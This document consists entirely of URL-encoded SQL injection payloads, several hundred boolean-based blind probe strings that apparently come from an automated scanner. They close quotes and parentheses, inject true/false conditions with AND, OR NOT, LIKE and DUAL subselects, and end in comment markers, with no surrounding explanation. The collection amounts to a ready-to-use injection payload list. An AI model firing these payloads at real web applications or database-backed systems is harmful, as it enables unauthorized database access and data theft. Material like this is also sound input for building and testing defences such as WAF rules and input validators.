1234.5%27%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%27qScb%27%3D%27qScb 1234.5%27%29%29%20AND%209247%3D6319--%20%20AND%20%28%28%27yggA%27%3D%27yggA 1234.5%27%29%29%29%20AND%206023%3D3136--%20%20AND%20%28%28%28%27Jmft%27%3D%27Jmft 1234.5%27%29%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%28%27MAmN%27%3D%27MAmN 1234.5%27%29%29%29%20AND%204403%3D7159--%20%20AND%20%28%28%28%27CPnn%27%3D%27CPnn 1234.5%27%20AND%205622%3D6308--%20%20AND%20%27bSXi%27%3D%27bSXi 1234.5%27%20AND%204158%3D4158--%20%20AND%20%27lEfK%27%3D%27lEfK 1234.5%27%20AND%206792%3D2362--%20%20AND%20%27mVhM%27%3D%27mVhM 1234.5%27%29%20AND%201655%3D1675--%20%20AND%20%28%27btpM%27%20LIKE%20%27btpM 1234.5%27%29%20AND%204158%3D4158--%20%20AND%20%28%27DFEv%27%20LIKE%20%27DFEv 1234.5%27%29%20AND%203619%3D9439--%20%20AND%20%28%27xEta%27%20LIKE%20%27xEta 1234.5%27%29%29%20AND%204925%3D3576--%20%20AND%20%28%28%27rPSw%27%20LIKE%20%27rPSw 1234.5%27%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%27OoPI%27%20LIKE%20%27OoPI 1234.5%27%29%29%20AND%209727%3D1828--%20%20AND%20%28%28%27aiqn%27%20LIKE%20%27aiqn 1234.5%27%29%29%29%20AND%201492%3D9366--%20%20AND%20%28%28%28%27cnbX%27%20LIKE%20%27cnbX 1234.5%27%29%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%28%27eJDB%27%20LIKE%20%27eJDB 1234.5%27%29%29%29%20AND%203915%3D8931--%20%20AND%20%28%28%28%27HnqC%27%20LIKE%20%27HnqC 1234.5%27%20AND%204531%3D9558--%20%20AND%20%27tJhS%27%20LIKE%20%27tJhS 1234.5%27%20AND%204158%3D4158--%20%20AND%20%27Oljn%27%20LIKE%20%27Oljn 1234.5%27%20AND%203100%3D6853--%20%20AND%20%27CzXa%27%20LIKE%20%27CzXa 1234.5%22%29%20AND%202423%3D8135--%20%20AND%20%28%22QXnx%22%3D%22QXnx 1234.5%22%29%20AND%204158%3D4158--%20%20AND%20%28%22HFRu%22%3D%22HFRu 1234.5%22%29%20AND%202454%3D3193--%20%20AND%20%28%22AGRX%22%3D%22AGRX 1234.5%22%29%29%20AND%209676%3D3583--%20%20AND%20%28%28%22befd%22%3D%22befd 1234.5%22%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%22ObbC%22%3D%22ObbC 1234.5%22%29%29%20AND%206278%3D8597--%20%20AND%20%28%28%22WVko%22%3D%22WVko 1234.5%22%29%29%29%20AND%207060%3D3723--%20%20AND%20%28%28%28%22ZBgh%22%3D%22ZBgh 1234.5%22%29%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%28%22DBhC%22%3D%22DBhC 1234.5%22%29%29%29%20AND%209867%3D7723--%20%20AND%20%28%28%28%22XEpB%22%3D%22XEpB 1234.5%22%20AND%206767%3D6654--%20%20AND%20%22KdbQ%22%3D%22KdbQ 1234.5%22%20AND%204158%3D4158--%20%20AND%20%22hOnu%22%3D%22hOnu 1234.5%22%20AND%207658%3D4462--%20%20AND%20%22mQWU%22%3D%22mQWU 1234.5%22%29%20AND%205705%3D5373--%20%20AND%20%28%22zaHX%22%20LIKE%20%22zaHX 1234.5%22%29%20AND%204158%3D4158--%20%20AND%20%28%22EHWj%22%20LIKE%20%22EHWj 1234.5%22%29%20AND%208350%3D9803--%20%20AND%20%28%22LuxC%22%20LIKE%20%22LuxC 1234.5%22%29%29%20AND%204102%3D3895--%20%20AND%20%28%28%22XcVQ%22%20LIKE%20%22XcVQ 1234.5%22%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%22huDU%22%20LIKE%20%22huDU 1234.5%22%29%29%20AND%201133%3D8236--%20%20AND%20%28%28%22TWTQ%22%20LIKE%20%22TWTQ 1234.5%22%29%29%29%20AND%209918%3D7079--%20%20AND%20%28%28%28%22huvP%22%20LIKE%20%22huvP 1234.5%22%29%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%28%22lhkx%22%20LIKE%20%22lhkx 1234.5%22%29%29%29%20AND%201361%3D2046--%20%20AND%20%28%28%28%22Nnxl%22%20LIKE%20%22Nnxl 1234.5%22%20AND%202351%3D6796--%20%20AND%20%22AbmI%22%20LIKE%20%22AbmI 1234.5%22%20AND%204158%3D4158--%20%20AND%20%22jKca%22%20LIKE%20%22jKca 1234.5%22%20AND%204547%3D3447--%20%20AND%20%22JhaX%22%20LIKE%20%22JhaX 1234.5%29%20WHERE%207661%3D7661%20AND%203159%3D7151--%20 1234.5%29%20WHERE%203501%3D3501%20AND%204158%3D4158--%20 1234.5%29%20WHERE%204478%3D4478%20AND%207745%3D2630--%20 1234.5%27%29%20WHERE%206943%3D6943%20AND%209656%3D1464--%20 1234.5%27%29%20WHERE%204565%3D4565%20AND%204158%3D4158--%20 1234.5%27%29%20WHERE%206604%3D6604%20AND%207196%3D4983--%20 1234.5%27%20WHERE%209380%3D9380%20AND%209755%3D4882--%20 1234.5%27%20WHERE%208666%3D8666%20AND%204158%3D4158--%20 1234.5%27%20WHERE%207049%3D7049%20AND%203126%3D1225--%20 1234.5%22%20WHERE%204785%3D4785%20AND%207112%3D3270--%20 1234.5%22%20WHERE%207464%3D7464%20AND%204158%3D4158--%20 1234.5%22%20WHERE%201008%3D1008%20AND%204585%3D5001--%20 1234.5%27%20%7C%7C%20%28SELECT%209034%20FROM%20DUAL%20WHERE%209451%3D9451%20AND%203705%3D4983--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203139%20FROM%20DUAL%20WHERE%207467%3D7467%20AND%204158%3D4158--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208706%20FROM%20DUAL%20WHERE%201941%3D1941%20AND%201380%3D2408--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201580%20WHERE%208866%3D8866%20AND%201464%3D8644--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206713%20WHERE%202310%3D2310%20AND%204158%3D4158--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203476%20WHERE%209209%3D9209%20AND%206851%3D9542--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206079%20FROM%20DUAL%20WHERE%203036%3D3036%20AND%208329%3D3201--%20%20%29 1234.5%20%2B%20%28SELECT%203121%20FROM%20DUAL%20WHERE%205581%3D5581%20AND%204158%3D4158--%20%20%29 1234.5%20%2B%20%28SELECT%202322%20FROM%20DUAL%20WHERE%208984%3D8984%20AND%206244%3D8337--%20%20%29 1234.5%20%2B%20%28SELECT%202723%20WHERE%204384%3D4384%20AND%205863%3D2399--%20%20%29 1234.5%20%2B%20%28SELECT%207025%20WHERE%205008%3D5008%20AND%204158%3D4158--%20%20%29 1234.5%20%2B%20%28SELECT%209219%20WHERE%202542%3D2542%20AND%204706%3D7067--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27mCMZ%27%20FROM%20DUAL%20WHERE%209054%3D9054%20AND%206344%3D3132--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UbyD%27%20FROM%20DUAL%20WHERE%206175%3D6175%20AND%204158%3D4158--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27cEYT%27%20FROM%20DUAL%20WHERE%201027%3D1027%20AND%201161%3D6805--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qFbR%27%20WHERE%202609%3D2609%20AND%209313%3D4303--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Xmwp%27%20WHERE%206464%3D6464%20AND%204158%3D4158--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jBMS%27%20WHERE%206007%3D6007%20AND%208211%3D1764--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%203660%3D4145--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204158%3D4158--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207260%3D5434--%20%20%23 -2932%29%20OR%20NOT%20%282611%3D5784%29 -8431%29%20OR%20NOT%20%288680%3D8680%29 -8584%29%20OR%20NOT%20%285353%3D9498%29 -5091%27%29%20OR%20NOT%20%289042%3D6579%29 -2650%27%29%20OR%20NOT%20%288680%3D8680%29 -1290%27%29%20OR%20NOT%20%282084%3D9176%29 -1140%27%20OR%20NOT%20%288469%3D1591%29 -4968%27%20OR%20NOT%20%288680%3D8680%29 -5757%27%20OR%20NOT%20%286902%3D7026%29 -5871%22%20OR%20NOT%20%284620%3D7987%29 -9254%22%20OR%20NOT%20%288680%3D8680%29 -8691%22%20OR%20NOT%20%287366%3D7155%29 -1946%29%20OR%20NOT%20%288331%3D9495%29%20AND%20%285331%3D5331 -3440%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%289766%3D9766 -2450%29%20OR%20NOT%20%281470%3D7599%29%20AND%20%285089%3D5089 -1016%29%29%20OR%20NOT%20%281663%3D5313%29%20AND%20%28%285083%3D5083 -6475%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%288370%3D8370 -9707%29%29%20OR%20NOT%20%283281%3D5833%29%20AND%20%28%282094%3D2094 -6048%29%29%29%20OR%20NOT%20%287094%3D9102%29%20AND%20%28%28%289726%3D9726 -8371%29%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%284857%3D4857 -5531%29%29%29%20OR%20NOT%20%288457%3D5093%29%20AND%20%28%28%284189%3D4189 -5641%20OR%20NOT%20%289370%3D6567%29 -5507%20OR%20NOT%20%288680%3D8680%29 -9324%20OR%20NOT%20%286754%3D7078%29 -8504%27%29%20OR%20NOT%20%288064%3D9157%29%20AND%20%28%27YEYb%27%3D%27YEYb -7421%27%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%27Rxsw%27%3D%27Rxsw -1544%27%29%20OR%20NOT%20%282359%3D9877%29%20AND%20%28%27aHjm%27%3D%27aHjm -3802%27%29%29%20OR%20NOT%20%283371%3D9689%29%20AND%20%28%28%27sdVA%27%3D%27sdVA -3761%27%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%27vLak%27%3D%27vLak -7033%27%29%29%20OR%20NOT%20%288983%3D9182%29%20AND%20%28%28%27vGXm%27%3D%27vGXm -7877%27%29%29%29%20OR%20NOT%20%282627%3D8724%29%20AND%20%28%28%28%27CZki%27%3D%27CZki -3497%27%29%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%28%27LZSk%27%3D%27LZSk -6014%27%29%29%29%20OR%20NOT%20%288061%3D4499%29%20AND%20%28%28%28%27dMQy%27%3D%27dMQy -1359%27%20OR%20NOT%20%283135%3D3055%29%20AND%20%27hBcr%27%3D%27hBcr -8030%27%20OR%20NOT%20%288680%3D8680%29%20AND%20%27swoS%27%3D%27swoS -7481%27%20OR%20NOT%20%283978%3D2200%29%20AND%20%27cNKF%27%3D%27cNKF -8823%27%29%20OR%20NOT%20%281845%3D1119%29%20AND%20%28%27rldR%27%20LIKE%20%27rldR -6839%27%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%27BRGU%27%20LIKE%20%27BRGU -8725%27%29%20OR%20NOT%20%285877%3D5168%29%20AND%20%28%27SLvK%27%20LIKE%20%27SLvK -5389%27%29%29%20OR%20NOT%20%282311%3D1336%29%20AND%20%28%28%27aSNI%27%20LIKE%20%27aSNI -5943%27%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%27ydlQ%27%20LIKE%20%27ydlQ -9961%27%29%29%20OR%20NOT%20%286311%3D7274%29%20AND%20%28%28%27xzur%27%20LIKE%20%27xzur -1869%27%29%29%29%20OR%20NOT%20%284812%3D1394%29%20AND%20%28%28%28%27BNMu%27%20LIKE%20%27BNMu -6467%27%29%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%28%27BxAO%27%20LIKE%20%27BxAO -1021%27%29%29%29%20OR%20NOT%20%284165%3D1718%29%20AND%20%28%28%28%27wRrS%27%20LIKE%20%27wRrS -9581%27%20OR%20NOT%20%281226%3D7487%29%20AND%20%27TWSJ%27%20LIKE%20%27TWSJ -4763%27%20OR%20NOT%20%288680%3D8680%29%20AND%20%27LbgS%27%20LIKE%20%27LbgS -5842%27%20OR%20NOT%20%283984%3D5775%29%20AND%20%27VhwS%27%20LIKE%20%27VhwS -4687%22%29%20OR%20NOT%20%285622%3D2005%29%20AND%20%28%22HLQA%22%3D%22HLQA -5089%22%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%22jNrb%22%3D%22jNrb -4549%22%29%20OR%20NOT%20%286577%3D7497%29%20AND%20%28%22RnyZ%22%3D%22RnyZ -7224%22%29%29%20OR%20NOT%20%283179%3D6095%29%20AND%20%28%28%22stgX%22%3D%22stgX -7789%22%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%22lTdK%22%3D%22lTdK -4324%22%29%29%20OR%20NOT%20%285295%3D4936%29%20AND%20%28%28%22Yvca%22%3D%22Yvca -3177%22%29%29%29%20OR%20NOT%20%284607%3D6704%29%20AND%20%28%28%28%22MFKQ%22%3D%22MFKQ -8384%22%29%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%28%22fBhu%22%3D%22fBhu -5575%22%29%29%29%20OR%20NOT%20%289586%3D8534%29%20AND%20%28%28%28%22wrTE%22%3D%22wrTE -3864%22%20OR%20NOT%20%282243%3D2417%29%20AND%20%22BBLS%22%3D%22BBLS -5769%22%20OR%20NOT%20%288680%3D8680%29%20AND%20%22bcYX%22%3D%22bcYX -2228%22%20OR%20NOT%20%287085%3D4626%29%20AND%20%22sIKD%22%3D%22sIKD -8833%22%29%20OR%20NOT%20%287911%3D4638%29%20AND%20%28%22PaLH%22%20LIKE%20%22PaLH -9110%22%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%22XjTg%22%20LIKE%20%22XjTg -1949%22%29%20OR%20NOT%20%288128%3D2193%29%20AND%20%28%22EJld%22%20LIKE%20%22EJld -1325%22%29%29%20OR%20NOT%20%286590%3D4600%29%20AND%20%28%28%22cyVj%22%20LIKE%20%22cyVj -1029%22%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%22vOqo%22%20LIKE%20%22vOqo -2594%22%29%29%20OR%20NOT%20%282623%3D2919%29%20AND%20%28%28%22uKaJ%22%20LIKE%20%22uKaJ -7610%22%29%29%29%20OR%20NOT%20%282775%3D7639%29%20AND%20%28%28%28%22gyvL%22%20LIKE%20%22gyvL -4709%22%29%29%29%20OR%20NOT%20%288680%3D8680%29%20AND%20%28%28%28%22YDxT%22%20LIKE%20%22YDxT -4192%22%29%29%29%20OR%20NOT%20%289540%3D3910%29%20AND%20%28%28%28%22KpTp%22%20LIKE%20%22KpTp -6190%22%20OR%20NOT%20%281275%3D6429%29%20AND%20%22ZaWI%22%20LIKE%20%22ZaWI -7819%22%20OR%20NOT%20%288680%3D8680%29%20AND%20%22fhwa%22%20LIKE%20%22fhwa -4121%22%20OR%20NOT%20%284805%3D2035%29%20AND%20%22xGoG%22%20LIKE%20%22xGoG -3443%29%20WHERE%202814%3D2814%20OR%20NOT%20%282980%3D7207%29 -7020%29%20WHERE%208997%3D8997%20OR%20NOT%20%288680%3D8680%29 -6877%29%20WHERE%205629%3D5629%20OR%20NOT%20%282743%3D2988%29 -5516%27%29%20WHERE%205310%3D5310%20OR%20NOT%20%286819%3D9555%29 -5285%27%29%20WHERE%201178%3D1178%20OR%20NOT%20%288680%3D8680%29 -3391%27%29%20WHERE%202909%3D2909%20OR%20NOT%20%283749%3D3504%29 -1952%27%20WHERE%207486%3D7486%20OR%20NOT%20%288025%3D1168%29 -4881%27%20WHERE%202916%3D2916%20OR%20NOT%20%288680%3D8680%29 -8549%27%20WHERE%205191%3D5191%20OR%20NOT%20%282362%3D4067%29 -6818%22%20WHERE%205570%3D5570%20OR%20NOT%20%289436%3D4248%29 -4449%22%20WHERE%207281%3D7281%20OR%20NOT%20%288680%3D8680%29 -6232%22%20WHERE%209818%3D9818%20OR%20NOT%20%289454%3D2722%29 -3199%29%20OR%20NOT%20%281252%3D7585%29%23 -1666%29%20OR%20NOT%20%285366%3D5366%29%23 -5181%29%20OR%20NOT%20%281499%3D7756%29%23 -2342%27%29%20OR%20NOT%20%281676%3D1655%29%23 -4031%27%29%20OR%20NOT%20%285366%3D5366%29%23 -7678%27%29%20OR%20NOT%20%285208%3D7267%29%23 -5146%27%20OR%20NOT%20%285240%3D7475%29%23 -5842%27%20OR%20NOT%20%285366%3D5366%29%23 -9027%27%20OR%20NOT%20%288051%3D8987%29%23 -9860%22%20OR%20NOT%20%284462%3D1533%29%23 -4161%22%20OR%20NOT%20%285366%3D5366%29%23 -6348%22%20OR%20NOT%20%283356%3D1893%29%23 -7546%29%20OR%20NOT%20%282639%3D2646%29%23%20AND%20%287445%3D7445 -2874%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%281473%3D1473 -3029%29%20OR%20NOT%20%283932%3D9531%29%23%20AND%20%281932%3D1932 -4804%29%29%20OR%20NOT%20%282204%3D3349%29%23%20AND%20%28%285610%3D5610 -7783%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%282806%3D2806 -7830%29%29%20OR%20NOT%20%285892%3D1441%29%23%20AND%20%28%285602%3D5602 -9765%29%29%29%20OR%20NOT%20%283719%3D5905%29%23%20AND%20%28%28%281102%3D1102 -6734%29%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%285931%3D5931 -9412%29%29%29%20OR%20NOT%20%287493%3D6236%29%23%20AND%20%28%28%289254%3D9254 -7561%20OR%20NOT%20%283133%3D9902%29%23 -6393%20OR%20NOT%20%285366%3D5366%29%23 -7720%20OR%20NOT%20%289721%3D8488%29%23 -2137%27%29%20OR%20NOT%20%288235%3D9861%29%23%20AND%20%28%27mdaR%27%3D%27mdaR -3837%27%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%27Wqzg%27%3D%27Wqzg -6826%27%29%20OR%20NOT%20%286181%3D8272%29%23%20AND%20%28%27pZZa%27%3D%27pZZa -5753%27%29%29%20OR%20NOT%20%281779%3D3580%29%23%20AND%20%28%28%27Mjxo%27%3D%27Mjxo -7899%27%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%27Krfe%27%3D%27Krfe -1610%27%29%29%20OR%20NOT%20%287485%3D7317%29%23%20AND%20%28%28%27nmVu%27%3D%27nmVu -6514%27%29%29%29%20OR%20NOT%20%283363%3D6463%29%23%20AND%20%28%28%28%27hVqy%27%3D%27hVqy -5272%27%29%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%28%27AkCK%27%3D%27AkCK -3215%27%29%29%29%20OR%20NOT%20%287427%3D2367%29%23%20AND%20%28%28%28%27FsSA%27%3D%27FsSA -2712%27%20OR%20NOT%20%285431%3D2223%29%23%20AND%20%27aifY%27%3D%27aifY -7426%27%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%27PTaW%27%3D%27PTaW -2339%27%20OR%20NOT%20%281227%3D7349%29%23%20AND%20%27UpWt%27%3D%27UpWt -5831%27%29%20OR%20NOT%20%284236%3D4946%29%23%20AND%20%28%27RHao%27%20LIKE%20%27RHao -2143%27%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%27Scgu%27%20LIKE%20%27Scgu -5111%27%29%20OR%20NOT%20%285629%3D9236%29%23%20AND%20%28%27mTNA%27%20LIKE%20%27mTNA -5501%27%29%29%20OR%20NOT%20%284295%3D4038%29%23%20AND%20%28%28%27MBHK%27%20LIKE%20%27MBHK -8675%27%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%27gdvl%27%20LIKE%20%27gdvl -9699%27%29%29%20OR%20NOT%20%287727%3D7466%29%23%20AND%20%28%28%27KRJX%27%20LIKE%20%27KRJX -5904%27%29%29%29%20OR%20NOT%20%286873%3D3265%29%23%20AND%20%28%28%28%27QncU%27%20LIKE%20%27QncU -8609%27%29%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%28%27kkGz%27%20LIKE%20%27kkGz -7005%27%29%29%29%20OR%20NOT%20%281228%3D6049%29%23%20AND%20%28%28%28%27cEbG%27%20LIKE%20%27cEbG -4409%27%20OR%20NOT%20%285474%3D8847%29%23%20AND%20%27RXtv%27%20LIKE%20%27RXtv -8984%27%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%27kBgF%27%20LIKE%20%27kBgF -6017%27%20OR%20NOT%20%288679%3D9023%29%23%20AND%20%27HDDb%27%20LIKE%20%27HDDb -2172%22%29%20OR%20NOT%20%286964%3D3420%29%23%20AND%20%28%22rrgO%22%3D%22rrgO -6733%22%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%22HRAr%22%3D%22HRAr -5316%22%29%20OR%20NOT%20%282140%3D3543%29%23%20AND%20%28%22xMFX%22%3D%22xMFX -6901%22%29%29%20OR%20NOT%20%283230%3D2123%29%23%20AND%20%28%28%22vPAT%22%3D%22vPAT -7177%22%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%22weru%22%3D%22weru -2341%22%29%29%20OR%20NOT%20%286635%3D2683%29%23%20AND%20%28%28%22kayy%22%3D%22kayy -7354%22%29%29%29%20OR%20NOT%20%283455%3D6067%29%23%20AND%20%28%28%28%22QIod%22%3D%22QIod -3807%22%29%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%28%22GvES%22%3D%22GvES -1725%22%29%29%29%20OR%20NOT%20%285117%3D8192%29%23%20AND%20%28%28%28%22tnwO%22%3D%22tnwO -1351%22%20OR%20NOT%20%288874%3D3771%29%23%20AND%20%22pNsT%22%3D%22pNsT -2715%22%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%22jRqU%22%3D%22jRqU -9283%22%20OR%20NOT%20%288061%3D1373%29%23%20AND%20%22uvoW%22%3D%22uvoW -4736%22%29%20OR%20NOT%20%281363%3D9880%29%23%20AND%20%28%22gJMS%22%20LIKE%20%22gJMS -7759%22%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%22GsIW%22%20LIKE%20%22GsIW -3556%22%29%20OR%20NOT%20%282576%3D4125%29%23%20AND%20%28%22omsm%22%20LIKE%20%22omsm -9483%22%29%29%20OR%20NOT%20%288231%3D1331%29%23%20AND%20%28%28%22ofoi%22%20LIKE%20%22ofoi -4010%22%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%22BKhe%22%20LIKE%20%22BKhe -2287%22%29%29%20OR%20NOT%20%287537%3D9860%29%23%20AND%20%28%28%22GBIY%22%20LIKE%20%22GBIY -3382%22%29%29%29%20OR%20NOT%20%281420%3D4628%29%23%20AND%20%28%28%28%22CdEH%22%20LIKE%20%22CdEH -3828%22%29%29%29%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%28%28%28%22AzrO%22%20LIKE%20%22AzrO -9698%22%29%29%29%20OR%20NOT%20%288862%3D6896%29%23%20AND%20%28%28%28%22zGwU%22%20LIKE%20%22zGwU -2653%22%20OR%20NOT%20%281709%3D9008%29%23%20AND%20%22KwBi%22%20LIKE%20%22KwBi -3423%22%20OR%20NOT%20%285366%3D5366%29%23%20AND%20%22AWpZ%22%20LIKE%20%22AWpZ -4056%22%20OR%20NOT%20%284223%3D1023%29%23%20AND%20%22kmTO%22%20LIKE%20%22kmTO -5040%29%20WHERE%201683%3D1683%20OR%20NOT%20%288292%3D8684%29%23 -9478%29%20WHERE%209642%3D9642%20OR%20NOT%20%285366%3D5366%29%23 -9700%29%20WHERE%204554%3D4554%20OR%20NOT%20%283317%3D2367%29%23 -3974%27%29%20WHERE%202475%3D2475%20OR%20NOT%20%283357%3D7109%29%23 -1340%27%29%20WHERE%209178%3D9178%20OR%20NOT%20%285366%3D5366%29%23 -2580%27%29%20WHERE%203073%3D3073%20OR%20NOT%20%284053%3D1465%29%23 -6577%27%20WHERE%205803%3D5803%20OR%20NOT%20%285133%3D5038%29%23 -9519%27%20WHERE%203377%3D3377%20OR%20NOT%20%285366%3D5366%29%23 -9106%27%20WHERE%201151%3D1151%20OR%20NOT%20%286197%3D2627%29%23 -4370%22%20WHERE%209570%3D9570%20OR%20NOT%20%287681%3D9508%29%23 -1581%22%20WHERE%208364%3D8364%20OR%20NOT%20%285366%3D5366%29%23 -8146%22%20WHERE%204178%3D4178%20OR%20NOT%20%289761%3D1239%29%23 -2401%29%20OR%20NOT%20%282224%3D5504%29--%20 -9470%29%20OR%20NOT%20%285756%3D5756%29--%20 -6707%29%20OR%20NOT%20%287605%3D1045%29--%20 -4759%27%29%20OR%20NOT%20%281770%3D7349%29--%20 -7674%27%29%20OR%20NOT%20%285756%3D5756%29--%20 -4177%27%29%20OR%20NOT%20%282384%3D4072%29--%20 -2692%27%20OR%20NOT%20%287702%3D1141%29--%20 -1201%27%20OR%20NOT%20%285756%3D5756%29--%20 -9777%27%20OR%20NOT%20%281691%3D2907%29--%20 -1676%22%20OR%20NOT%20%286213%3D5887%29--%20 -5702%22%20OR%20NOT%20%285756%3D5756%29--%20 -7221%22%20OR%20NOT%20%283053%3D8249%29--%20 -6818%29%20OR%20NOT%20%289298%3D4697%29--%20%20AND%20%285836%3D5836 -9184%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%287099%3D7099 -4512%29%20OR%20NOT%20%287060%3D6908%29--%20%20AND%20%285908%3D5908 -2114%29%29%20OR%20NOT%20%289487%3D6427%29--%20%20AND%20%28%287498%3D7498 -5473%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%282991%3D2991 -6948%29%29%20OR%20NOT%20%287608%3D4870%29--%20%20AND%20%28%283711%3D3711 -1909%29%29%29%20OR%20NOT%20%284655%3D5675%29--%20%20AND%20%28%28%281939%3D1939 -7555%29%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%283431%3D3431 -7649%29%29%29%20OR%20NOT%20%284544%3D8565%29--%20%20AND%20%28%28%287506%3D7506 -7017%20OR%20NOT%20%286531%3D3179%29--%20 -9078%20OR%20NOT%20%285756%3D5756%29--%20 -1108%20OR%20NOT%20%282465%3D8978%29--%20 -1825%27%29%20OR%20NOT%20%285076%3D6800%29--%20%20AND%20%28%27KheW%27%3D%27KheW -5243%27%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%27fqjE%27%3D%27fqjE -3679%27%29%20OR%20NOT%20%281715%3D1921%29--%20%20AND%20%28%27NJre%27%3D%27NJre -3433%27%29%29%20OR%20NOT%20%287238%3D7853%29--%20%20AND%20%28%28%27FJhV%27%3D%27FJhV -2367%27%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%27OiDI%27%3D%27OiDI -9607%27%29%29%20OR%20NOT%20%281558%3D7961%29--%20%20AND%20%28%28%27cfEW%27%3D%27cfEW -8790%27%29%29%29%20OR%20NOT%20%288514%3D4060%29--%20%20AND%20%28%28%28%27pPoA%27%3D%27pPoA -2228%27%29%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%28%27boCv%27%3D%27boCv -3305%27%29%29%29%20OR%20NOT%20%289493%3D7894%29--%20%20AND%20%28%28%28%27wCxq%27%3D%27wCxq -8259%27%20OR%20NOT%20%283605%3D6446%29--%20%20AND%20%27PpbX%27%3D%27PpbX -8806%27%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%27LFky%27%3D%27LFky -6705%27%20OR%20NOT%20%281882%3D5140%29--%20%20AND%20%27QKzc%27%3D%27QKzc -1687%27%29%20OR%20NOT%20%284973%3D2779%29--%20%20AND%20%28%27jbrN%27%20LIKE%20%27jbrN -3281%27%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%27ISgv%27%20LIKE%20%27ISgv -7892%27%29%20OR%20NOT%20%286981%3D8298%29--%20%20AND%20%28%27wqhE%27%20LIKE%20%27wqhE -5256%27%29%29%20OR%20NOT%20%282520%3D8396%29--%20%20AND%20%28%28%27LtGM%27%20LIKE%20%27LtGM -4251%27%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%27CvFZ%27%20LIKE%20%27CvFZ -8302%27%29%29%20OR%20NOT%20%287304%3D3745%29--%20%20AND%20%28%28%27uiTe%27%20LIKE%20%27uiTe -6529%27%29%29%29%20OR%20NOT%20%285491%3D7868%29--%20%20AND%20%28%28%28%27Tyba%27%20LIKE%20%27Tyba -2895%27%29%29%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%28%28%27tahx%27%20LIKE%20%27tahx -7408%27%29%29%29%20OR%20NOT%20%283196%3D4018%29--%20%20AND%20%28%28%28%27mXaT%27%20LIKE%20%27mXaT -1413%27%20OR%20NOT%20%283691%3D1642%29--%20%20AND%20%27klBq%27%20LIKE%20%27klBq -7108%27%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%27AlNa%27%20LIKE%20%27AlNa -4272%27%20OR%20NOT%20%286323%3D1689%29--%20%20AND%20%27fPIV%27%20LIKE%20%27fPIV -3442%22%29%20OR%20NOT%20%281233%3D3540%29--%20%20AND%20%28%22yQEA%22%3D%22yQEA -9601%22%29%20OR%20NOT%20%285756%3D5756%29--%20%20AND%20%28%22nXni%22%3D%22nXni -9236%22%29%20OR%20NOT%20%285016%3D3212%29--%20%20AND%20%28%22usOd%22%3D%22usOd 